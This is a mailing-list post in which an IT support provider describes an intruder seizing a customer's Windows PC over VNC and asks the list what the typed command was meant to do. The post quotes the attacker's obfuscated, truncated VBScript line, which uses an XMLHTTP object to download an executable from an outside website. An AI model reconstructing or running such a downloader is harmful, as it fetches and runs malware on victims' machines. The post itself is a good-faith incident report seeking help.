Hello All. This is very off topic, but I figure it won't kill anyone
if I ask. There are a number of very smart cookies on this list, and
I bet someone out there can enlighten me.
Today I got a call from one off my customers who runs VNC for remote
support access. She was working away, and suddenly her mouse
started to move, it opened up a CMD session (it's really a DOS
session, but we aren't supposed to know that Windows is just another
DOS app are we!!!) and it typed the following:
C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE
nExt:F="L.eXe":SEt
p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/
NETSTAT
On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct
("mSxmL2.xmLhttp"):p.OpEn"gEt",
"HtTp://WwW.JmDoNgyI.CoM/
Now, I am not an XML guy, but it looks to me like this person was
trying to use XML and download content from a likely infected
website. I went to the website (I use a MAC, so I don't generally
worry about getting a browser hack) and, you guessed it, it was a
Chinese site. I googled the www.jmdongyi.com name but got no hits.
I connected to her PC and found no strange connections to it at the
time. I ran a malware, virus scan and it was clean also. I had her
turn off vnc for now and explained to her how she could turn it on
when she needs to allow someone access. Incidentally, she was using
a non dictionary password with alpha and numeric characters.
My question is, what was the XML string actually trying to do.
Thanks to all who offer assistance.
Chris Curtis
Sandpoint Computers
Office 208-265-1608
Cell 208-610-3062
-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys -- and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
sql-ledger-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
